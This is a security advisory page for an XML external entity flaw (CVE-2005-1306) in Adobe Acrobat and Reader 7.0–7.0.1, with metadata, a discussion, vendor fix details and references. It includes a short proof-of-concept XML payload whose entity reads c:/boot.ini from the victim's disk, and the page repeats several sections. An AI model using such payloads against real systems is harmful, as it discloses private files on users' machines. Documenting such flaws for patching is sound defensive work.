Adobe Acrobat/Adobe Reader File Existence and Disclosure Vulnerability
BID:13962
Info
Adobe Acrobat/Adobe Reader File Existence and Disclosure Vulnerability
| Bugtraq ID: | 13962 |
| Class: | Design Error |
| CVE: |
CVE-2005-1306 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 15 2005 12:00AM |
| Updated: | Jul 12 2009 04:06PM |
| Credit: | Sverre H. Huseby is credited with the discovery of this issue. |
| Vulnerable: |
Adobe Reader 7.0.1 Adobe Reader 7.0 Adobe Acrobat 7.0.1 Adobe Acrobat 7.0 |
| Not Vulnerable: |
Adobe Reader 7.0.2 Adobe Acrobat 7.0.2 |
Discussion
Adobe Acrobat/Adobe Reader File Existence and Disclosure Vulnerability
Adobe Acrobat and Adobe Reader may allow remote attackers to determine the existence of files on a vulnerable computer. This issue can be used to disclose data from a target file as well.
Information gathered through the exploitation of this vulnerability may aid in other attacks.
Adobe Acrobat and Adobe Reader may allow remote attackers to determine the existence of files on a vulnerable computer. This issue can be used to disclose data from a target file as well.
Information gathered through the exploitation of this vulnerability may aid in other attacks.
Exploit / POC
Adobe Acrobat/Adobe Reader File Existence and Disclosure Vulnerability
An exploit is not required.
The following proof of concept is available:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "c:/boot.ini">
]>
<foo>&xxe;</foo>
More proof of concept examples are available at the following location:
http://shh.thathost.com/secadv/adobexxe/
An exploit is not required.
The following proof of concept is available:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "c:/boot.ini">
]>
<foo>&xxe;</foo>
More proof of concept examples are available at the following location:
http://shh.thathost.com/secadv/adobexxe/
Solution / Fix
Adobe Acrobat/Adobe Reader File Existence and Disclosure Vulnerability
Solution:
The vendor has released upgrades to address this issue.
Adobe Acrobat 7.0
Adobe Reader 7.0
Adobe Reader 7.0.1
Adobe Acrobat 7.0.1
Solution:
The vendor has released upgrades to address this issue.
Adobe Acrobat 7.0
-
Adobe Adobe Acrobat 7.0.2
http://www.adobe.com/support/downloads/
Adobe Reader 7.0
-
Adobe Adobe Acrobat Reader 7.0.2
http://www.adobe.com/support/downloads/
Adobe Reader 7.0.1
-
Adobe Adobe Acrobat Reader 7.0.2
http://www.adobe.com/support/downloads/
Adobe Acrobat 7.0.1
-
Adobe Adobe Acrobat 7.0.2
http://www.adobe.com/support/downloads/
References
Adobe Acrobat/Adobe Reader File Existence and Disclosure Vulnerability
References:
References:
- Adobe Homepage (Adobe)
- Adobe Reader XML External Entity Attack (Sverre H. Huseby)
- XML External Entity vulnerability (Adobe Reader and Acrobat 7.0-7.0.1) (Adobe)